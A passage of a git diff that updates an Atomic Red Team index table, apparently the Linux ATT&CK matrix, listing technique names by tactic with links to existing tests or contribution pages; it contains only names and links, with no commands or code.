TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | -| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Administration Command](../../T1609/T1609.md) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | +| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | [At (Linux)](../../T1053.001/T1053.001.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) | +| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Deploy Container [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Clear Command History](../../T1070.003/T1070.003.md) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Escape to Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | [Local Account](../../T1087.001/T1087.001.md) | | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Python](../../T1059.006/T1059.006.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Deploy Container [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Sniffing](../../T1040/T1040.md) | | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | [Systemd Timers](../../T1053.006/T1053.006.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Keylogging](../../T1056.001/T1056.001.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) | +| | [Unix Shell](../../T1059.004/T1059.004.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | +| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | [Local Account](../../T1136.001/T1136.001.md) | [Systemd Service](../../T1543.002/T1543.002.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Screen Capture](../../T1113/T1113.md) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Timers](../../T1053.006/T1053.006.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | | +| | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Trap](../../T1546.005/T1546.005.md) | [File Deletion](../../T1070.004/T1070.004.md) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | XDG Autostart Entries [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Cookies [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Remote Access Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Impair Command History Logging](../../T1562.003/T1562.003.md) | | | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | | +| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | +| | | RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | | | +| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | [Systemd Service](../../T1543.002/T1543.002.md) | | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | @@ -49,10 +53,10 @@ | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Network Boundary Bridging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | Transport Agent [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | [Trap](../../T1546.005/T1546.005.md) | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | | -| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Patch System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | | Patch System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | XDG Autostart Entries [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | diff --git a/atomics/Indexes/Matrices/macos-matrix.md 